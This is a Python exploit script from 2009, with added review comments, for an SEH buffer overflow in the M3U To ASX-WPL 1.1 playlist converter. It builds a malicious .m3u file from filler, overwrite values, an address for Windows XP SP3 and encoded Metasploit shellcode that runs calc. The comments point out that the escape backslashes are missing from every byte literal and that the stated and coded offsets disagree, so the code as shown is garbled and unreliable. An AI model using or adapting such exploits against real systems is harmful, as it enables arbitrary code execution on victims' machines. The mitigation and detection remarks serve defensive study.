# Title : M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit
# Published : 2009-12-05
# Author : Encrypt3d.M!Nd
#exploit.py
#
# M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit
# By: Encrypt3d.M!Nd
# http://m1nd3d.wordpress.com/
#
#################################################################
#
# SEH overwrite method - you can use a simple jmp esp.
# According to my calculations EIP would change after
# 1378 bytes. It may be different on other systems.
#
# Two short strings that the final write call places between the first filler
# run and the second one. The header comment names the technique as an SEH
# overwrite, so these are presumably the two values intended for the
# overwritten exception record -- confirm against the original advisory.
# NOTE(review): as rendered on this page each literal holds printable text
# (for example "xeb"), not raw byte values.
# Defensive note: `sh` is annotated as tied to msacm32.drv on Windows XP SP3,
# presumably a fixed address in that one build; SafeSEH, SEHOP and ASLR are
# the standard mitigations for this class of overwrite.
ns = "xebx15x90x90"
sh = "xbex2exd1x72" # Windows XP sp3 - msacm32.drv
#
#windows/exec - 461 bytes
#http://www.metasploit.com
#Encoder: x86/alpha_upper
#EXITFUNC=thread, CMD=calc
#
# Payload text exactly as published. The comment block directly above
# attributes it to Metasploit's windows/exec payload (x86/alpha_upper encoder,
# EXITFUNC=thread, CMD=calc), so the stated command is the calculator that
# proof-of-concept code uses to show that execution was reached.
# Python concatenates the adjacent string literals inside the parentheses into
# a single string.
# NOTE(review): as rendered on this page the literals are printable text, so
# the length of this string is not the 461 bytes quoted above.
# Detection hint: a playlist line this long, made up of a repeated filler run
# followed by dense alphanumeric data, is not a plausible media path and can
# be flagged by content inspection before the file reaches the converter.
shellcode = (
"x89xe2xdaxc4xd9x72xf4x5bx53x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4bx58x4bx39x43x30"
"x43x30x43x30x45x30x4bx39x4bx55x46x51x49x42x42"
"x44x4cx4bx51x42x50x30x4cx4bx51x42x44x4cx4cx4b"
"x51x42x42x34x4cx4bx44x32x46x48x44x4fx48x37x50"
"x4ax51x36x46x51x4bx4fx46x51x49x50x4ex4cx47x4c"
"x45x31x43x4cx43x32x46x4cx47x50x49x51x48x4fx44"
"x4dx43x31x48x47x4ax42x4ax50x46x32x46x37x4cx4b"
"x50x52x42x30x4cx4bx47x32x47x4cx45x51x4ex30x4c"
"x4bx51x50x42x58x4cx45x4fx30x42x54x51x5ax45x51"
"x48x50x50x50x4cx4bx47x38x44x58x4cx4bx50x58x47"
"x50x45x51x48x53x4ax43x47x4cx47x39x4cx4bx46x54"
"x4cx4bx43x31x49x46x46x51x4bx4fx46x51x4fx30x4e"
"x4cx49x51x48x4fx44x4dx43x31x4fx37x46x58x4bx50"
"x43x45x4bx44x45x53x43x4dx4ax58x47x4bx43x4dx51"
"x34x43x45x4bx52x46x38x4cx4bx51x48x51x34x45x51"
"x4ex33x42x46x4cx4bx44x4cx50x4bx4cx4bx46x38x45"
"x4cx45x51x48x53x4cx4bx43x34x4cx4bx43x31x4ex30"
"x4dx59x47x34x47x54x46x44x51x4bx51x4bx43x51x46"
"x39x51x4ax50x51x4bx4fx4dx30x46x38x51x4fx51x4a"
"x4cx4bx44x52x4ax4bx4bx36x51x4dx43x5ax45x51x4c"
"x4dx4dx55x4fx49x45x50x43x30x45x50x46x30x42x48"
"x46x51x4cx4bx42x4fx4dx57x4bx4fx49x45x4fx4bx4d"
"x30x45x4dx47x5ax44x4ax43x58x4fx56x4cx55x4fx4d"
"x4dx4dx4bx4fx4ex35x47x4cx43x36x43x4cx44x4ax4d"
"x50x4bx4bx4dx30x42x55x45x55x4fx4bx51x57x42x33"
"x42x52x42x4fx43x5ax45x50x51x43x4bx4fx4ex35x42"
"x43x43x51x42x4cx42x43x43x30x41x41")
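# Write the playlist file in one pass. Layout, in order: the string "x41"
# repeated 1386 times, `ns`, `sh`, "x41" repeated 30 times, then `shellcode`.
# NOTE(review): the header comment quotes an offset of 1378 while this line
# uses 1386; the page does not explain the difference.
# The context manager closes the handle even if write() raises, and the handle
# is no longer bound to the name `file`, which is a builtin type on Python 2.
with open('m3utoasx.m3u','w') as playlist:
    playlist.write("x41" * 1386+ns+sh+"x41" * 30+shellcode)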